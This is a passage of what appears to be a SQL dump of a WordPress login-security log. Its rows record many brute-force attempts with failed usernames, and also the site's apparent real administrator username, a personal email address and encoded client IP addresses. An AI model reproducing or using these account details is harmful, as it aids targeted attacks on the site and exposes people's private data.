Safari/537.36'),(19351,120573,1695349542.207634,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB5B0AE5F,'Mozilla/5.0 (Linux; Android 11; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19363,120854,1695562367.404414,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E96E3,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64'),(19364,120857,1695564708.657462,1,'loginFailInvalidUsername','jonbarratt',0,0x00000000000000000000FFFF4AF9F448,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19365,120858,1695564709.030337,1,'loginFailInvalidUsername','jonbarratt',0,0x00000000000000000000FFFF4AF9F448,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19366,120859,1695564709.725270,1,'loginFailInvalidUsername','jonbarratt',0,0x00000000000000000000FFFF4AF9F448,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19432,125714,1697298801.462730,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(19480,128158,1697981278.583293,1,'loginFailInvalidUsername','wwwadmin',0,0x00000000000000000000FFFF334D35CA,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(19488,128318,1698087084.677295,1,'loginFailInvalidUsername','individualise',0,0x00000000000000000000FFFF39804123,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19489,128319,1698087085.004883,1,'loginFailInvalidUsername','individualise',0,0x00000000000000000000FFFF39804123,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19490,128320,1698087085.396532,1,'loginFailInvalidUsername','individualise',0,0x00000000000000000000FFFF39804123,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19491,128321,1698087085.723766,1,'loginFailInvalidUsername','individualise',0,0x00000000000000000000FFFF39804123,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19492,128322,1698087086.047038,1,'loginFailInvalidUsername','individualise',0,0x00000000000000000000FFFF39804123,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19493,128323,1698087086.374252,1,'loginFailInvalidUsername','individualise',0,0x00000000000000000000FFFF39804123,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19690,131269,1699138989.785888,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19688,131267,1699138191.141926,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19689,131268,1699138774.915753,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19687,131266,1699137901.880722,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF80C75146,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(19686,131265,1699137900.676805,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF80C75146,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(19684,131263,1699137408.254430,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19685,131264,1699137899.543816,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF80C75146,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(19683,131262,1699136619.529782,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19681,131261,1699136391.868014,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19682,131261,1699136391.871985,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19680,131259,1699135825.587453,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19678,131257,1699134256.372131,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19679,131258,1699135044.045676,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19676,131255,1699133476.580859,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19677,131256,1699134129.667604,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34B204F0,'Mozilla/5.0'),(19675,131244,1699131812.966855,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19674,131243,1699131812.563642,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19673,131242,1699131812.158425,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19672,131241,1699131811.756768,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19671,131240,1699131811.349411,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19670,131240,1699131811.346911,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19669,131239,1699131810.886448,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19668,131238,1699131810.482928,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19667,131237,1699131810.080853,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19666,131236,1699131809.674861,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19665,131236,1699131809.672399,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19664,131235,1699131809.269936,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19663,131234,1699131808.837359,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19662,131233,1699130908.851984,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19661,131232,1699130908.452645,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19660,131231,1699130908.051959,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19659,131230,1699130907.651579,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19658,131229,1699130907.252029,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19657,131228,1699130906.849154,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19656,131227,1699130906.411359,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19655,131226,1699130906.003380,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19654,131225,1699130905.576849,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19653,131224,1699130905.128358,1,'loginFailInvalidUsername','chris',0,0x00000000000000000000FFFFB92FAE56,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19610,131183,1699114178.909492,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19609,131182,1699113403.425228,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19607,131180,1699111873.286784,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19608,131181,1699112636.485096,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19606,131179,1699111424.050662,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19604,131177,1699111105.136304,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19605,131178,1699111399.982503,1,'loginFailInvalidUsername','choll.03@comcast.net',0,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19602,131175,1699109599.002959,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19603,131176,1699110348.934238,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19601,131174,1699108837.707800,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19588,131153,1699104231.810745,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19587,131152,1699103566.527876,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF2D93F810,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19006,116033,1693305843.279833,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFC5FE26C6,'Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(19005,116032,1693305839.922725,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFC59B4CC6,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(19004,116031,1693305835.982565,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF0EE8176A,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.101 Mobile/15E148 Safari/604.1'),(19003,116030,1693305833.414341,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF245F324A,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15'),(18439,109491,1691408329.642772,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFF92382633,'Mozilla/5.0 (Linux; Android 12; SM-G996U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18431,109451,1691377368.614668,1,'loginFailInvalidUsername','shaohao',0,0x00000000000000000000FFFF8A00778C,'Mozilla/5.0 (Linux; Android 11; SM-A125U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36'),(18430,109450,1691377366.180238,1,'loginFailInvalidUsername','lpd-admin',0,0x00000000000000000000FFFFBAB364EF,'Mozilla/5.0 (Linux; Android 11; SM-A526U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18429,109449,1691377363.234862,1,'loginFailInvalidUsername','ncpsite',0,0x00000000000000000000FFFFBCA60E1A,'Mozilla/5.0 (Linux; Android 8.1.0; REVVL 2 PLUS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18428,109448,1691377357.565310,1,'loginFailInvalidUsername','admin@eckankar-colorado.org',0,0x00000000000000000000FFFF67788526,'Mozilla/5.0 (Linux; Android 12; SM-N970U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18427,109447,1691377286.176543,1,'loginFailInvalidUsername','admin777',0,0x00000000000000000000FFFF71A1F3C3,'Mozilla/5.0 (Linux; Android 12; SM-F711U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18426,109446,1691377283.961407,1,'loginFailInvalidUsername','chen',0,0x00000000000000000000FFFF7354633F,'Mozilla/5.0 (Linux; Android 12; SM-G973U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18425,109445,1691377281.062180,1,'loginFailInvalidUsername','rexxar',0,0x00000000000000000000FFFF676E31E3,'Mozilla/5.0 (Linux; Android 11; SM-N976U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18424,109444,1691377278.269047,1,'loginFailInvalidUsername','blackhand',0,0x00000000000000000000FFFFBB6FCAE8,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36'),(18423,109443,1691377276.184445,1,'loginFailInvalidUsername','durotan',0,0x00000000000000000000FFFF2D246AF9,'Mozilla/5.0 (Linux; Android 10; moto z4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18422,109442,1691377260.792673,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFB90609AA,'Mozilla/5.0 (iPad; CPU OS 15_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1'),(18421,109440,1691373420.861263,1,'loginFailInvalidUsername','admin777',0,0x00000000000000000000FFFFB527563A,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 OPR/82.0.4227.43'),(18420,109439,1691373418.696990,1,'loginFailInvalidUsername','chen',0,0x00000000000000000000FFFF67C7CB0D,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 DuckDuckGo/7 Safari/605.1.15'),(18419,109438,1691373415.852863,1,'loginFailInvalidUsername','rexxar',0,0x00000000000000000000FFFFCBCAFDD5,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15'),(18418,109437,1691373412.910257,1,'loginFailInvalidUsername','blackhand',0,0x00000000000000000000FFFF0C342272,'Mozilla/5.0 (Linux; Android 11; SM-G998U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18417,109436,1691373411.576466,1,'loginFailInvalidUsername','durotan',0,0x00000000000000000000FFFF6D3D137A,'Mozilla/5.0 (Linux; Android 11; SM-A215U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18416,109433,1691372807.906842,1,'loginFailInvalidUsername','admin-lpd',0,0x00000000000000000000FFFF0EA21D3E,'Mozilla/5.0 (Linux; Android 11; Pixel 4 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18415,109432,1691372793.654222,1,'loginFailInvalidUsername','wrathion',0,0x00000000000000000000FFFF6883AA66,'Mozilla/5.0 (Linux; Android 8.1.0; SM-T378V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18414,109431,1691372792.073145,1,'loginFailInvalidUsername','shaohao',0,0x00000000000000000000FFFF9A42E05D,'Mozilla/5.0 (Linux; Android 8.1.0; REVVL 2 PLUS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18413,109430,1691372779.551443,1,'loginFailInvalidUsername','ncpsite',0,0x00000000000000000000FFFFCA93C21A,'Mozilla/5.0 (Linux; Android 12; Pixel 3a XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18412,109429,1691372771.623900,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFF2BFC9F2E,'Mozilla/5.0 (Linux; Android 11; A509DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18411,109424,1691349529.475659,1,'loginFailInvalidUsername','Eckankar-colorado',0,0x00000000000000000000FFFF554A0FA3,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18410,109423,1691349027.855626,1,'loginFailInvalidUsername','Admin!',0,0x00000000000000000000FFFFC5934524,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18409,109422,1691348912.602274,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF1B4E4A58,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18408,109421,1691348789.381338,1,'loginFailInvalidUsername','Eckankar-colorado.org!',0,0x00000000000000000000FFFF0EB9E433,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18407,109420,1691348732.468184,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF55840ACC,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(20162,134886,1700374407.237099,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20163,134887,1700374407.590542,1,'loginFailInvalidUsername','sbayart',0,0x00000000000000000000FFFF67F14254,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19762,131600,1699320001.827259,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF78196878,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(19763,131601,1699321525.245798,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19764,131602,1699322105.643657,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19765,131603,1699322711.550308,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19766,131604,1699323344.566387,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19767,131605,1699323946.624275,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19768,131606,1699323989.078638,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19769,131606,1699323989.081123,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19770,131607,1699324382.595427,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19771,131608,1699324629.964282,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19772,131609,1699325273.642867,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19773,131610,1699325915.372489,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19774,131611,1699326562.891662,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19775,131612,1699326977.721175,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5146F8A9,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(19776,131613,1699327195.067839,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19777,131614,1699327519.226861,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFCA86136E,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(19778,131618,1699327821.971897,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19779,131618,1699327821.974395,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19780,131619,1699328455.365198,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19781,131620,1699329084.494523,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19782,131621,1699329725.276460,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19783,131622,1699330090.034325,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19784,131623,1699330368.133425,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E8062F,'Mozilla/5.0'),(19785,131624,1699330391.651946,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19786,131625,1699330392.559492,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19787,131626,1699330392.894213,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19788,131627,1699330393.220509,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19789,131628,1699330393.571379,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19790,131629,1699330393.912622,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19791,131630,1699330394.236283,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19792,131631,1699330394.563002,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF365CD0B8,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19981,134339,1700069800.696569,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19903,132289,1699467211.337397,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(19904,132290,1699469852.062764,1,'loginFailInvalidUsername','wordpress_administrator',0,0x00000000000000000000FFFFD18D3E31,'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(19897,131766,1699376210.631718,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(19898,131942,1699390256.712605,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF9566F412,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45'),(19899,131956,1699409962.370511,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFACEA141F,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19900,132282,1699458117.319767,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF67D6E586,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like 